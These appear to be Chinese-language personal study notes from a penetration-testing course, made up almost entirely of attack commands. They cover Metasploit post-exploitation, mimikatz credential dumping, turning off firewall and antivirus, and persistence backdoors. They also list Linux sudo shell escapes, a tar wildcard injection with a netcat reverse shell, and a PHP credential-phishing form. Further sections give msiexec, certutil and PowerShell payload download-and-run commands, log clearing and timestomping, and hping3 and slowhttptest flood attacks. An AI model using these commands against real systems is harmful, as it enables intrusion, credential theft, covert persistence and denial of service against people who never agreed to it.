<p>[*] Backgrounding session 2…</p>
<p>msf6 exploit(multi/handler) &gt; use post/windows/manage/inject_host</p>
<p>msf6 post(windows/manage/inject_host) &gt; show options </p>
<p>Module options (post/windows/manage/inject_host):</p>
<p>  Name   Current Setting Required Description</p>
<hr>
<p>  DOMAIN          yes    Domain name for host file manipulation.</p>
<p>  IP                        yes    IP address to point domain name to.</p>
<p>  SESSION         yes    The session to run this module on</p>
<p>msf6 post(windows/manage/inject_host) &gt; set ip 192.168.31.110</p>
<p>ip =&gt; 192.168.31.110</p>
<p>msf6 post(windows/manage/inject_host) &gt; set domain <a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a></p>
<p>domain =&gt; <a target="_blank" rel="noopener" href="http://www.baidu.com/">www.baidu.com</a></p>
<p>msf6 post(windows/manage/inject_host) &gt; set sessions 2</p>
<p>[-] Unknown datastore option: sessions. Did you mean SESSION?</p>
<p>msf6 post(windows/manage/inject_host) &gt; set session 2</p>
<p>session =&gt; 2</p>
<hr>
<h3 id="用户认证钓鱼"><a href="#用户认证钓鱼" class="headerlink" title="用户认证钓鱼"></a>用户认证钓鱼</h3><p>进入session中</p>
<p>run post/windows/gather/phish_windows_credentials</p>
<p>这个时候用户桌面会出现管理员认证窗口</p>
<h3 id="passTheHash"><a href="#passTheHash" class="headerlink" title="passTheHash:"></a>passTheHash:</h3><p>必须要是system权限</p>
<p>进入session中</p>
<p>run post/windows/gather/hashdump 获取操作系统的hash值</p>
<p>可以获取管理员密码加密之后的密码，之后使用穷举的方法破解</p>
<hr>
<h2 id="mimikatz猕猴桃"><a href="#mimikatz猕猴桃" class="headerlink" title="mimikatz猕猴桃"></a>mimikatz猕猴桃</h2><p>load mimikatz(load kiwi) 加载猕猴桃</p>
<p>help（help kiwi） 查看可以使用什么命令</p>
<p>creds_all 列出所有凭据</p>
<p>creds_kerberos 拿到kerberos凭据</p>
<p>creds_msv 拿到加密之后的密码</p>
<p>privilege::debug      当前进程提升为debug权限</p>
<p>inject::process lsass.exe sekurlsa.dll   注入lsass.exe进程</p>
<p>sekurlsa::logonPasswords  列出所有用户密码</p>
<p>system::user        当前用户名</p>
<p>system::computer      当前主机名</p>
<p>process::list        列出所有进程</p>
<p>process::modules       列出当前加载模块</p>
<p>ts::multirdp         支持多用户远程登录</p>
<hr>
<h2 id="防火墙和3389："><a href="#防火墙和3389：" class="headerlink" title="防火墙和3389："></a>防火墙和3389：</h2><p>关闭防火墙</p>
<p>netsh advfirewall set allprofiles state off</p>
<p>关闭defener</p>
<p>net stop windefend</p>
<p>关闭dep（数据执行保护）</p>
<p>bcdedit.exe /set {current} nx AlwaysOff</p>
<p>在meterpreter中</p>
<p>run killav  （ ） 关闭杀毒软件</p>
<p>开启远程桌面（3389端口）netstat -ano</p>
<p>run post/windows/manage/enable_rdp</p>
<p>run getgui -e （这个命令也是开启远程桌面的，但是不太靠谱）</p>
<p>run getgui -u [用户名] -p [密码]  创建用户（users）</p>
<p>kali使用图形界面控制远程桌面</p>
<p>rdesktop -u [用户名] -p [密码] [目标ip]</p>
<hr>
<p>截图</p>
<p><strong>load espia</strong></p>
<p>screengrab</p>
<h2 id="永久后门植入"><a href="#永久后门植入" class="headerlink" title="永久后门植入"></a>永久后门植入</h2><p>meterpreter shell 运行是在内存里的，重启消失，所以需要植入后门</p>
<p>卸载对方的补丁</p>
<p>给对方安装一些有漏洞的软件（比如说ftp程序，输入法…….）</p>
<p>msf永久后门</p>
<p>run metsvc -A 设置端口上传后门文件</p>
<p>会开启一个31337端口</p>
<p>jobs可以看到metsvc_bind_tcp</p>
<p>连接</p>
<p>use exploit/multi/handler</p>
<p>set payload windows/metsvc_bind_tcp</p>
<p>set rhost [目标ip]</p>
<p>set lport 31337</p>
<p>exploit</p>
<hr>
<p>植入启动型后门</p>
<p>在session中</p>
<p>run persistence -A -S -U -i 10 -p 4321 -r [自己ip]</p>
<p>或者</p>
<p>run persistence -X -i 10 -p 4321 -r [自己ip] （成功率高）</p>
<hr>
<h2 id="linux提权"><a href="#linux提权" class="headerlink" title="linux提权"></a>linux提权</h2><p>linux靶场用户名密码</p>
<p>bob secret</p>
<p>kali</p>
<p>ssh bob@[目标ip]</p>
<p>密码secret</p>
<hr>
<p><strong>/bin/bash /bin/sh</strong>   <strong>不同的<strong><strong>shell</strong></strong>界面</strong></p>
<p>ash  轻量级Shell  </p>
<p><strong>sudo ash</strong></p>
<p>awk  文本分析工具</p>
<p><strong>sudo awk ‘BEGIN {system(“/bin/sh”)}’</strong></p>
<p>bash</p>
<p><strong>sudo bash</strong></p>
<p>csh   C shell</p>
<p><strong>sudo csh</strong></p>
<p>curl</p>
<p><strong>sudo curl file:///etc/shadow</strong></p>
<p>dash</p>
<p><strong>sudo dash</strong></p>
<p>ed</p>
<p><strong>sudo ed</strong></p>
<p><strong>!/bin/sh</strong></p>
<p>env</p>
<p><strong>sudo env /bin/sh</strong></p>
<p>expect</p>
<p><strong>sudo expect -c ‘spawn /bin/sh;interact’</strong></p>
<p>find</p>
<p><strong>sudo find . -exec /bin/sh ; -quit</strong></p>
<p>ftp</p>
<p><strong>sudo ftp</strong></p>
<p><strong>!/bin/sh</strong></p>
<p>less</p>
<p><strong>sudo less /etc/passwd</strong></p>
<p><strong>!/bin/sh</strong></p>
<p>more</p>
<p><strong>sudo more /etc/passwd</strong></p>
<p><strong>!/bin/sh</strong></p>
<p>man</p>
<p><strong>sudo man man</strong></p>
<p><strong>!/bin/sh</strong></p>
<p>socat</p>
<p><strong>sodu socat stdin exec:/bin/sh</strong></p>
<p>ssh</p>
<p><strong>sudo ssh -o ProxyCommand=’;sh 0&lt;&amp;2 1&gt;&amp;2’ x</strong></p>
<p>vi</p>
<p><strong>sudo vi -c ‘:!/bin/sh’ /dev/null</strong></p>
<p>zsh</p>
<p><strong>sudo zsh</strong></p>
<p>pico</p>
<p><strong>sudo pico</strong></p>
<p><strong>^R^X</strong></p>
<p><strong>reset; sh 1&gt;&amp;0 2&gt;&amp;0</strong></p>
<p>rvim</p>
<p><strong>sudo rvim -c ‘:python3 import os; os.execl(“/bin/sh”,”sh”,”-c”,”reset; exec sh”)’</strong></p>
<p>perl</p>
<p><strong>sudo perl -e ‘exec “/bin/sh”;’</strong></p>
<p>tclsh</p>
<p><strong>sudo tclsh</strong></p>
<p><strong>exec /bin/sh &lt;@stdin &gt;@stdout 2&gt;@stderr</strong></p>
<p>git</p>
<p><strong>sudo git -p help config</strong></p>
<p><strong>!/bin/sh</strong></p>
<p>script</p>
<p><strong>sudo script -q /dev/null</strong></p>
<p>taskset</p>
<p><strong>taskset 1 /bin/sh -p</strong></p>
<hr>
<p><strong>密码破解</strong></p>
<p>cat /etc/passwd</p>
<p>insecurity 密码P@ssw0rd</p>
<p>su insecurity切换到这个用户权限</p>
<hr>
<h2 id="tar命令注入"><a href="#tar命令注入" class="headerlink" title="tar命令注入"></a>tar命令注入</h2><p>cat /etc/crontab</p>
<p>ls -l /etc/cron.daily/backup</p>
<p>cat /etc/cron.daily/backup</p>
<p><strong>for i in $(ls /home); do cd /home/$i &amp;&amp; /bin/tar -zcf /etc/backups/home-$i.tgz *; done</strong></p>
<p><strong>msfvenom -p cmd/unix/reverse_netcat lhost=192.168.31.110 lport=8888</strong></p>
<p><strong>得到</strong></p>
<p><strong>mkfifo /tmp/mwbtz; nc 192.168.31.110 8888 0&lt;/tmp/mwbtz | /bin/sh &gt;/tmp/mwbtz 2&gt;&1; rm /tmp/mwbtz</strong></p>
<p><strong>echo “mkfifo /tmp/mwbtz; nc 192.168.31.110 8888 0&lt;/tmp/mwbtz | /bin/sh &gt;/tmp/mwbtz 2&gt;&1; rm /tmp/mwbtz” &gt; shell.sh &amp;&amp; chmod +x shell.sh</strong></p>
<p><strong>echo &gt; “—checkpoint-action=exec=sh shell.sh”</strong></p>
<p><strong>echo &gt; “—checkpoint=1”</strong></p>
<hr>
<h2 id="寻找敏感的隐藏文件"><a href="#寻找敏感的隐藏文件" class="headerlink" title="寻找敏感的隐藏文件"></a>寻找敏感的隐藏文件</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -name <span class="string">&quot;.*&quot;</span> -<span class="built_in">type</span> f -path <span class="string">&quot;/home/*&quot;</span> -<span class="built_in">exec</span> <span class="built_in">ls</span> -al &#123;&#125; \; </span><br></pre></td></tr></table></figure>

<p>发现/home/susan/.secret</p>
<p>之后可以看到susan的密码</p>
<p>su susan就可以切换到susan的权限</p>
<hr>
<h2 id="SID提权"><a href="#SID提权" class="headerlink" title="SID提权"></a>SID提权</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -4000 -type f -exec ls -al &#123;&#125; \;</span><br></pre></td></tr></table></figure>

<p>可以看到</p>
<p>/usr/bin/xxd</p>
<p>xxd /etc/shadow | xxd -r</p>
<p>可以看到密码/etc/shadow的加密密码，复制root那一条保存为pass.txt</p>
<h2 id="穷举密码"><a href="#穷举密码" class="headerlink" title="穷举密码"></a>穷举密码</h2><p>john pass.txt -w=/usr/share/wordlists/rockyou.txt</p>
<p>发现密码是root—secret123</p>
<hr>
<h2 id="NFS提权"><a href="#NFS提权" class="headerlink" title="NFS提权"></a>NFS提权</h2><p> kali</p>
<p>nmap 192.168.87.134扫描目标服务器端口</p>
<p>发现2049端口，这个是nfs端口</p>
<p>showmount -e 192.168.87.134</p>
<p>发现</p>
<p>/home/peter的目录是开放的</p>
<p>cd /tmp</p>
<p>mkdir nfs</p>
<p>mount -t nfs 192.168.87.134:/home/peter /tmp/nfs/</p>
<p>ls -la /tmp/nfs/ 可以看到目标peter上的文件夹</p>
<p>cp /bin/bash /tmp/nfs/ 发现权限不够</p>
<p>此时需要在kali上面伪造一个和目标一模一样的peter</p>
<p>groupadd -g 1005 peter</p>
<p>adduser peter -uid 1001 -gid 1005</p>
<p>cd /tmp/nfs/</p>
<p>su peter 转化到kali的peter上</p>
<p>mkdir .ssh 在目标peter的共享文件夹上创建一个.ssh文件夹，为以后使用ssh去连接他做准备</p>
<p>cd ~ 进入kali的peter的文件夹</p>
<p>ssh-keygen 生成ssh的key（如果有选项，都选默认即可）</p>
<p>cd /tmp/nfs/</p>
<p>cat ~/.ssh/id_rsa.pub &gt; ./.ssh/authorized_keys 把kali的peter的ssh密钥复制到目标peter的.ssh文件夹中</p>
<p>cd ~/.ssh</p>
<p>之后回到kali的peter的.ssh文件夹</p>
<p>ssh -i id_rsa <a href="mailto:&#112;&#101;&#x74;&#101;&#x72;&#64;&#x31;&#x39;&#50;&#x2e;&#49;&#x36;&#56;&#x2e;&#56;&#55;&#46;&#49;&#51;&#52;">&#112;&#101;&#x74;&#101;&#x72;&#64;&#x31;&#x39;&#50;&#x2e;&#49;&#x36;&#56;&#x2e;&#56;&#55;&#46;&#49;&#51;&#52;</a> 此时就可以免密码登录到目标的peter</p>
<p>sudo -l 查看能使用什么命令</p>
<p>发现strace可以无密码使用</p>
<p>sudo strace -o /dev/null /bin/sh</p>
<hr>
<h2 id="docker提权"><a href="#docker提权" class="headerlink" title="docker提权"></a>docker提权</h2><p>docker –version</p>
<p>docker run -v /:/hostOS -i -t chrisfosterelli/rootplease</p>
<h2 id="社会工程学："><a href="#社会工程学：" class="headerlink" title="社会工程学："></a>社会工程学：</h2><p>网络钓鱼：</p>
<p>使用网站克隆工具进行钓鱼</p>
<p>实在不行，手写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method=&quot;POST&quot; action=&quot;&quot;&gt;</span><br><span class="line">  &lt;input type=&quot;text&quot; name=&quot;user&quot; /&gt;&lt;br/&gt;</span><br><span class="line">  &lt;input type=&quot;password&quot; name=&quot;pass&quot; /&gt;&lt;br/&gt;</span><br><span class="line">  &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;提交&quot;/&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$username = $_POST[&#x27;user&#x27;];</span><br><span class="line">$password = $_POST[&#x27;pass&#x27;];</span><br><span class="line"></span><br><span class="line">$txt = $username.&#x27;-----&#x27;.$password.&quot;\n&quot;;</span><br><span class="line">$file = fopen(&quot;./haha.txt&quot;,&quot;a+&quot;);</span><br><span class="line">fwrite($file,$txt);</span><br><span class="line">fclose($file);</span><br><span class="line">header(&quot;location:https://127.0.0.1&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="电话钓鱼："><a href="#电话钓鱼：" class="headerlink" title="电话钓鱼："></a>电话钓鱼：</h2><p>skype</p>
<p>伪装模拟：</p>
<p>防止人家用社工的手段追踪自己</p>
<p>安全指数最高的邮箱protonmail</p>
<p>10分钟邮箱</p>
<p>短信/电话接码平台</p>
<p>注册国外的产品：</p>
<p>购买/注册google voice（gv）账号</p>
<p>自己制作网站：</p>
<p>vps</p>
<p>挂cdn，cloudflare（只能代理80 443）</p>
<hr>
<h2 id="个人信息搜集："><a href="#个人信息搜集：" class="headerlink" title="个人信息搜集："></a>个人信息搜集：</h2><p>策略</p>
<p>qq 微信 博客 微博 社区 贴吧 开房记录 外卖 快递 手机app</p>
<p>社工库</p>
<p>人轨</p>
<p>qq—&gt;手机号—&gt;支付宝</p>
<p>群关系，学校，同学关系</p>
<p>3D面部建模（证件照，身份证，护照。。。。。）</p>
<p>简历，公司关系查询</p>
<hr>
<p>通过服务启动</p>
<p>use exploit/multi/handler</p>
<p>set payload windows/metsvc_bind_tcp</p>
<p>set lport 31337</p>
<p>set rhost [目标ip]</p>
<p>exploit</p>
<hr>
<h2 id="永久性后门"><a href="#永久性后门" class="headerlink" title="永久性后门"></a>永久性后门</h2><p>use exploit/multi/handler</p>
<p>set payload windows/meterpreter/reverse_tcp</p>
<p>set lport 4321</p>
<p>set lhost [自己ip]</p>
<p>exploit</p>
<hr>
<p>上传文件：</p>
<p>进入一个session中</p>
<p>upload /root/nc.exe c:\\</p>
<p>查看注册表里有什么内容</p>
<p>reg enumkey -k HKLM\software\microsoft\windows\currentversion\run</p>
<p>把nc放到自动启动里面</p>
<p>reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘c:\nc.exe -Ldp 444 -e cmd.exe’</p>
<p>查看代码写的对不对<br>reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc</p>
<p>查看防火墙状态</p>
<p>netsh firewall show opmode</p>
<p><strong>添加一个防火墙规则允许444端口通过</strong></p>
<p>netsh firewall add portopening TCP 444 “FireWall” ENABLE ALL</p>
<p>目标主机重启之后</p>
<p>nc -v [目标主机] 444</p>
<hr>
<p>小知识：</p>
<p>注册表修改的内容可以在msconfig里查到</p>
<p>可以考虑使用自解压的方法进行伪装</p>
<hr>
<p>kali启动apache</p>
<p>service apache2 start </p>
<p>apache的目录/var/www/html中</p>
<hr>
<p>使用vbs去远程下载文件</p>
<p>创建a.vbs</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">set</span> a=<span class="built_in">createobject</span>(<span class="string">&quot;adod&quot;</span>+<span class="string">&quot;b.stream&quot;</span>):<span class="keyword">set</span> w=<span class="built_in">createobject</span>(<span class="string">&quot;micr&quot;</span>+<span class="string">&quot;osoft.xmlhttp&quot;</span>):w.open<span class="string">&quot;get&quot;</span>,wsh.arguments(<span class="number">0</span>),<span class="number">0</span>:w.send:a.type=<span class="number">1</span>:a.open:a.write w.responsebody:a.savetofile wsh.arguments(<span class="number">1</span>),<span class="number">2</span></span><br></pre></td></tr></table></figure>

<p>cmd运行</p>
<p>cscript a.vbs http://自己服务器/a.txt c:\b.txt</p>
<p>也可以使用echo直接写</p>
<p>echo set a=createobject(“adod”+”b.stream”):set w=createobject(“micr”+”osoft.xmlhttp”):w.open”get”,wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 &gt;&gt; a.vbs</p>
<hr>
<p>certutil下载文件：</p>
<p>certutil -urlcache -split -f http://自己ip/a.txt</p>
<p>会下载到本目录</p>
<p>有一个弊端：</p>
<p>每次下载的时候，都有留存，导致会留下入侵痕迹，所以每次下载之后，都要痕迹清理</p>
<p>certutil -urlcache -split -f http://自己ip/a.txt delete</p>
<p>校验hash值</p>
<p>certutil -hashfile c:\xxx.exe</p>
<p>如果文件被动过，hash值就会改变</p>
<p>加密解密文件：</p>
<p>certutil -encode c:\a.txt c:\en.txt</p>
<p>certutil -decode c:\en.txt c:\a.txt</p>
<hr>
<p>使用bitsadmin下载</p>
<p>bitsadmin /rawreturn /transfer down http://自己ip/a.txt c:\a.txt</p>
<hr>
<p>使用js下载</p>
<p>创建一个a.js</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> <span class="title class_">WinHttpReq</span> = <span class="keyword">new</span> <span class="title class_">ActiveXObject</span>(<span class="string">&quot;WinHttp.WinHttpRequest.5.1&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="title class_">WinHttpReq</span>.<span class="title class_">Open</span>(<span class="string">&quot;GET&quot;</span>,<span class="title class_">WScript</span>.<span class="title class_">Arguments</span>(<span class="number">0</span>),<span class="comment">/*async=*/</span><span class="literal">false</span>);<span class="title class_">WinHttpReq</span>.<span class="title class_">Send</span>();</span><br><span class="line"></span><br><span class="line"><span class="title class_">WScript</span>.<span class="title class_">Echo</span>(<span class="title class_">WinHttpReq</span>.<span class="property">ResponseText</span>);</span><br></pre></td></tr></table></figure>

<p>cscript /nologo a.js http://自己ip/a.txt &gt;&gt; 123.txt</p>
<hr>
<p>其他命令：</p>
<p>uictl [enable/disable] [keyboard/mouse/all] 开启/停用鼠标键盘</p>
<p>webcam_list 查看摄像头</p>
<p>webcam_snap 通过摄像头拍照</p>
<p>webcam_stream 通过摄像头开启视频</p>
<p>execute 在目标上面执行程序</p>
<p>execute -H -i -f cmd.exe 创建新的隐藏可交互命令cmd.exe</p>
<p>getpid 获取当前进程pid</p>
<p>ps 查看活跃进程</p>
<p>migreate [pid] 把meterpreter转移到某个pid中</p>
<p>kill [pid] 杀掉某个进程</p>
<p>clearev 清除日志，清除windows里的应用程序，系统日志，安全日志</p>
<p>timestomp -v c://a.exe 查看c盘a.exe的时间戳</p>
<p>timestomp c://b.exe -f c://a.exe 将a.exe的时间复制给b.exe</p>
<hr>
<h2 id="运维："><a href="#运维：" class="headerlink" title="运维："></a>运维：</h2><p>系统工程师，linux，windows</p>
<p>网络工程师，路由器，交换机，防火墙…</p>
<p>（不会编程）</p>
<p>自动运维</p>
<p>图形界面</p>
<hr>
<p>当作！！！！！！</p>
<p>文件头的作用：</p>
<p>告诉系统，把下面的二进制代码，当作什么来执行！！！！！</p>
<p>操作系统为了方便用户使用，使用后缀名机制：</p>
<p>.exe .dll .jpg .jpeg .png .avi .mp3 .mp4…..</p>
<hr>
<h2 id="协议"><a href="#协议" class="headerlink" title="协议"></a>协议</h2><p>曾老师协议</p>
<p>协议头001100-&gt;内 容1-&gt;结束语1111</p>
<p>001100 xxxxxxxxxxx 1111</p>
<p>010010110101010101010101011 001100 10101010100101010 1111 01010101010</p>
<p>PE文件（exe程序）</p>
<p>PE头，代码段，函数，资源，结尾</p>
<h2 id="文件合并"><a href="#文件合并" class="headerlink" title="文件合并"></a>文件合并</h2><p>copy 1.png /b + 2.rar /b 3.png</p>
<p>合并1.png和2.rar为3.png</p>
<p>有的时候可以用图片打开，也可以用rar打开</p>
<h2 id="木马"><a href="#木马" class="headerlink" title="木马"></a>木马</h2><p>生成一个txt木马（使用msi执行）</p>
<p>msfvenom -p windows/x64/shell/reverse_tcp lhost=[黑客ip] lport=4444 -f msi &gt; haha.txt</p>
<p>把haha.txt放到某个web目录里</p>
<p>msi=静默安装包</p>
<p>默认位置：</p>
<p>c:/windows/system32/msiexec.exe</p>
<p>c:/windows/syswow64/msiexec.exe</p>
<p>远程加载木马到电脑上运行</p>
<p>msiexec /q /i <a target="_blank" rel="noopener" href="http://web的ip/haha.txt">http://web的ip/haha.txt</a></p>
<p>dll</p>
<p>msfvenom -p windows/x64/shell/reverse_tcp lhost=[黑客ip] lport=4444 -f dll &gt; haha.dll</p>
<p>msiexec /y haha.dll</p>
<p>rundll32.exe shell32.dll,Control_RunDLL ./haha.dll</p>
<hr>
<p>forfiles执行</p>
<p>forfiles.exe /q c:\windows\system32 /m cmd.exe /c “msiexec /q /i <a target="_blank" rel="noopener" href="http://web的ip/msi.txt&quot;">http://web的ip/msi.txt&quot;</a></p>
<hr>
<h2 id="pstools"><a href="#pstools" class="headerlink" title="pstools"></a>pstools</h2><p>微软官方自带的系统插件</p>
<p>准备工作：</p>
<p>1.目标主机的防火墙最好关闭</p>
<p>2.创建/获得对方计算机的用户名密码</p>
<p>直接控制对方cmd</p>
<p>psexec \目标ip -u [目标用户名] -p [密码] cmd.exe</p>
<p>控制对方电脑运行自己的c盘的xk.exe</p>
<p>psexec \目标ip -u [目标用户名] -p [密码] -c c:\xk.exe</p>
<p>远程运行对方电脑的notepad.exe</p>
<p>psexec \目标ip -u [目标用户名] -p [密码] -d notepad.exe</p>
<p>以system权限运行自己电脑的xk.exe</p>
<p>psexec \目标ip -u [目标用户名] -p [密码] -s -c c:\xk.exe</p>
<p>以system权限运行对方的notepad.exe</p>
<p>psexec \目标ip -u [目标用户名] -p [密码] -s -d notepad.exe</p>
<hr>
<h2 id="pcalua"><a href="#pcalua" class="headerlink" title="pcalua"></a>pcalua</h2><p>处理情况：</p>
<p>1.当前电脑硬盘不能用</p>
<p>2.自己权限不高</p>
<p>在目标上运行黑客电脑c盘的xk.exe</p>
<p>pcalua -m -a \黑客ip\c$\xk.exe</p>
<hr>
<h2 id="zipfldr执行共享程序"><a href="#zipfldr执行共享程序" class="headerlink" title="zipfldr执行共享程序"></a>zipfldr执行共享程序</h2><p>rundll32.exe zipfldr.dll,RouteTheCall \黑客ip\c$\xk.exe</p>
<hr>
<p>android</p>
<p>基于linux</p>
<p>开发语言java kotlin</p>
<p>应用广泛：</p>
<p>什么地方都有java虚拟机</p>
<p>java-&gt;臃肿-&gt;java虚拟机-&gt;c语言-&gt;机器语言-&gt;操作系统</p>
<p>oc/swift-&gt;机器语言-&gt;操作系统</p>
<hr>
<p>java web（api）</p>
<p>jsp+linux+mysql/oracle/db2+tomcat</p>
<p>java—jsp—-spring（全家桶）+前端</p>
<hr>
<p>jvm pc</p>
<p> java=&gt;jar程序</p>
<p> kotlin（简单）=&gt;jar程序</p>
<p> c#（c++++难度不高，只能windows/.net平台运行）</p>
<p> python（超级简单，功能超多！！！）</p>
<p> Golang（c的精确度，python的快速开发，几乎啥都能做） </p>
<hr>
<p>java android</p>
<p>java+c（编写.so = windows的dll文件）=&gt;android</p>
<hr>
<p>纠结什么语言有前途。。。。</p>
<p>这个语言后台是否有大佬或者大公司投入？</p>
<p>c/c++    java    kotlin    oc/swift    php    python    golang    c++/c#/vb    rust</p>
<hr>
<p>android木马</p>
<p>如果想学习android开发：</p>
<p>不要在意自己学的是不是java，因为在android上编程，相当于一门长得很像java的java语言</p>
<hr>
<h2 id="驱动级的文件处理："><a href="#驱动级的文件处理：" class="headerlink" title="驱动级的文件处理："></a>驱动级的文件处理：</h2><p><a target="_blank" rel="noopener" href="http://www.xoslab.com/efl.html">http://www.xoslab.com/efl.html</a> </p>
<p>c:/windows/xlfks.xxx（dat，dll，ini，log）</p>
<p>c:/windows/system32/drivers/xlkfs.sys</p>
<p>如果碰到了就说明是驱动级的文件隐藏</p>
<p>如何清除：</p>
<p>1.查询服务状态 sc qc xlkfs</p>
<p>2.停止服务 net stop xlkfs</p>
<p>3.删除服务 sc delete xlkfs</p>
<p>4.找到xklfs的残余都删掉</p>
<hr>
<p>注册表自启动</p>
<p>winlogon/userinit</p>
<p>logon script</p>
<hr>
<p>计划任务：</p>
<p>schtasks /create /sc minute /mo 1 /tn “haha” /tr “powershell.exe -nop -w hidden -c &quot;IEX((new-object net.webclient).downloading(&quot;&quot;&quot;<a target="_blank" rel="noopener" href="http://192.168.87.150/msi.txt/&quot;/&quot;/&quot;))/&quot;&quot;">http://192.168.87.150/msi.txt\&quot;\&quot;\&quot;))\&quot;&quot;</a></p>
<hr>
<p>服务启动：</p>
<p>增加一个服务</p>
<p>sc create “nihao” binpath=”cmd /c start mkdir c:\123”</p>
<p>设置服务描述</p>
<p>sc description nihao “hahahaha”</p>
<p>设置自动启动</p>
<p>sc config nihao start=auto </p>
<p>net start nihao 开启服务</p>
<hr>
<h2 id="DOS拒绝服务攻击"><a href="#DOS拒绝服务攻击" class="headerlink" title="DOS拒绝服务攻击"></a>DOS拒绝服务攻击</h2><p>parrotOS = kali</p>
<p>parrotsec</p>
<hr>
<h3 id="DDOS-分布式拒绝服务攻击"><a href="#DDOS-分布式拒绝服务攻击" class="headerlink" title="DDOS = 分布式拒绝服务攻击"></a>DDOS = 分布式拒绝服务攻击</h3><p>tcp三次握手</p>
<p>目前ddos攻击无解</p>
<p>一般大佬防御（用钱）</p>
<p>大多数情况，如果目标网站是挂了CDN，那你打的就是cdn，没效果</p>
<hr>
<h3 id="ssl-dos"><a href="#ssl-dos" class="headerlink" title="ssl-dos"></a>ssl-dos</h3><p>apt-get install thc-ssl-dos</p>
<p>目标是打击https网站</p>
<p>thc-ssl-dos [目标ip] [目标ssl：443] –accept</p>
<hr>
<h3 id="慢速攻击（打击网站有效果）"><a href="#慢速攻击（打击网站有效果）" class="headerlink" title="慢速攻击（打击网站有效果）"></a>慢速攻击（打击网站有效果）</h3><p>apt-get install openssl</p>
<p>apt-get install libssl-dev</p>
<p>apt-get install slowhttptest</p>
<h3 id="slowhttptest"><a href="#slowhttptest" class="headerlink" title="slowhttptest"></a>slowhttptest</h3><p>低带宽应用层慢速DOS攻击（相对于cc慢）</p>
<p>擅长攻击apache，tomcat服务器</p>
<p>耗尽应用的并发连接池，类似于http层的syn_flood</p>
<p>http协议默认是收到全部请求后开始处理，如果客户发送的数据包慢速而且不完整，就会导致DoS</p>
<h3 id="slow-http-post慢速攻击（RUDY）"><a href="#slow-http-post慢速攻击（RUDY）" class="headerlink" title="slow http post慢速攻击（RUDY）"></a>slow http post慢速攻击（RUDY）</h3><p>slowhttptest -c 2000 -B -g -o body_states -i 110 -r 200 -s 8192 -t FAKEVERB -u <a target="_blank" rel="noopener" href="http://192.168.87.150/">http://192.168.87.150</a> -x 10 -p 3</p>
<h3 id="slowloris攻击"><a href="#slowloris攻击" class="headerlink" title="slowloris攻击"></a>slowloris攻击</h3><p>原理：</p>
<p>完整http结尾\r\n\r\n 它攻击结尾\r\n</p>
<p>slowhttptest -c 2000 -H -g -o my_header_states -i 10 -r 1000 -t GET -u <a target="_blank" rel="noopener" href="http://192.168.87.150/">http://192.168.87.150</a> -x 24 -p 3</p>
<p>syn flood</p>
<p>syn洪水攻击</p>
<p>git clone <a target="_blank" rel="noopener" href="https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git">https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git</a></p>
<hr>
<h3 id="dns放大攻击"><a href="#dns放大攻击" class="headerlink" title="dns放大攻击"></a>dns放大攻击</h3><p>发送给dns服务器数据包94</p>
<p>返回的数据包大小160+</p>
<p>典型的流量放大攻击，以小汇多</p>
<p>利用协议特定进行放大流量</p>
<p>apt-get install dnsutils</p>
<p>dig ANY qq.com @[dns的ip]</p>
<p>利用回包进行攻击</p>
<hr>
<h3 id="hping3"><a href="#hping3" class="headerlink" title="hping3"></a>hping3</h3><p>定制发送任何的数据包</p>
<p>-a 伪造源地址</p>
<p>-q 不返回</p>
<p>-n 不解析域名</p>
<p>-s 源端口</p>
<p>-d 字节数</p>
<p>-p 端口</p>
<p>–flood 以flood形式攻击</p>
<p>syn-flood</p>
<p>hping3 -c 3000 -d 120 -S -w 64 -p 80 –flood –rand-source [目标ip]</p>
<p>hping3 -S -P -p 80 –flood –rand-source [目标ip]</p>
<p>tcp-flood</p>
<p>hping3 -SARUFP -p 80 –flood –rand-source [目标ip]</p>
<p>icmp-flood</p>
<p>hping3 -q -n -a 1.1.1.1 –icmp -d 56 –flood [目标ip]</p>
<p>udp-flood</p>
<p>hping3 -a 1.1.1.1 –udp -s 53 -d 100 -p 53 –flood [目标ip]</p>
<p>LAND</p>
<p>特殊的syn-flood攻击</p>
<p>源地址和目的地址都是受害者，自己和自己完成三次握手</p>
<p>hping3 -n -a [目标ip] -S -d 100 -p 80 –flood [目标ip]</p>
<p>TCP全链接DOS攻击</p>
<p>nping –tcp-connect –rate=10000 -c 100000000 -q [目标ip]</p>
<h2 id="应急响应："><a href="#应急响应：" class="headerlink" title="应急响应："></a>应急响应：</h2><p>web入侵</p>
<p>挂马，网页篡改（菠菜，黑帽seo），植入webshell，黑页，暗链等</p>
<p>主机入侵</p>
<p>病毒木马，勒索病毒，远控后门，系统异常，RDP爆破，SSH爆破，主机漏洞，数据库入侵等</p>
<p>网络攻击</p>
<p>DDOS/CC攻击，ARP攻击，DNS/HTTP劫持</p>
